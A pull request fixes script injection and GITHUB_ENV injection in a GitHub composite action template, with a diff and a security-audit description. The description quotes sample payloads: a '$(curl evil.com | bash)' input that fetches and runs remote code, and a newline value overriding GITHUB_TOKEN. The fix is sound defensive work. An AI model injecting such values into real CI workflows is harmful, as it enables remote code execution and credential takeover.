### PR TITLE
Fix: use env: indirection pattern and remove GITHUB_ENV injection

### DIFF
--- a/action.yaml
+++ b/action.yaml
@@ -23,15 +23,24 @@ runs:
     - name: "Friendly Name"
       id: code
       shell: bash
+      env:
+        INPUT_VALUE: ${{ inputs.input }}
       run: |
         # Friendly Name
-        input="${{ inputs.input }}"
+        input="$INPUT_VALUE"
         if [ -z "$input" ]; then
           echo "Error: mandatory input was not set/configured ❌"
           exit 1
         fi
 
-        echo "output=$input" >> "$GITHUB_ENV"
-        echo "output=$input" >> "$GITHUB_OUTPUT"
+        # Write the output using the multiline heredoc format with a random
+        # delimiter so that an input containing newlines cannot inject
+        # additional keys into $GITHUB_OUTPUT (output-file injection).
+        delimiter="ghadelim_$(openssl rand -hex 16 2>/dev/null || date +%s%N)"
+        {
+          printf '%s<<%s\n' 'output' "$delimiter"
+          printf '%s\n' "$input"
+          printf '%s\n' "$delimiter"
+        } >> "$GITHUB_OUTPUT"
         echo "Action received: $input ✅"
         echo "Action received: $input ✅" >> "$GITHUB_STEP_SUMMARY"


### PR DESCRIPTION
Security Finding: #24 (MEDIUM)

Vulnerability Details:
- Finding #24 (MEDIUM, lines 28, 34): The template demonstrates two
  unsafe patterns:

  1. Direct template injection (line 28):
       input="${{ inputs.input }}"
     This is the exact anti-pattern that causes script injection in
     all composite actions derived from this template. A value like
     '$(curl evil.com | bash)' executes at template-expansion time.

  2. GITHUB_ENV injection (line 34):
       echo "output=$input" >> "$GITHUB_ENV"
     Writing user-controlled values to GITHUB_ENV without newline
     sanitization allows environment variable injection. A value
     containing '\nGITHUB_TOKEN=pwned' overrides GITHUB_TOKEN in
     all subsequent steps. Additionally, setting values in GITHUB_ENV
     is unnecessary here since GITHUB_OUTPUT already exports the value.

  As the canonical template for all lfreleng-actions repos, this
  propagates both anti-patterns org-wide when new actions are created.

Remediation Applied:
- Input now passes through the step's 'env:' block (INPUT_VALUE),
  demonstrating the correct pattern for all derived actions.
- Removed the GITHUB_ENV write entirely — GITHUB_OUTPUT is sufficient
  for passing values between steps and to action outputs. This
  eliminates the env-file injection vector and simplifies the template.
- Shell code references $INPUT_VALUE instead of template expression.

Impact:
- Template consumers creating new actions will inherit the safe pattern.
- Existing actions derived from this template are NOT automatically
  fixed — they require individual remediation (tracked separately).
- The output 'output' is still available via GITHUB_OUTPUT for
  downstream steps and action consumers.

Reference: lfreleng-actions composite action security audit (2025-06)

Signed-off-by: Anil Belur <askb23@gmail.com>
Signed-off-by: Anil Belur <abelur@linuxfoundation.org>
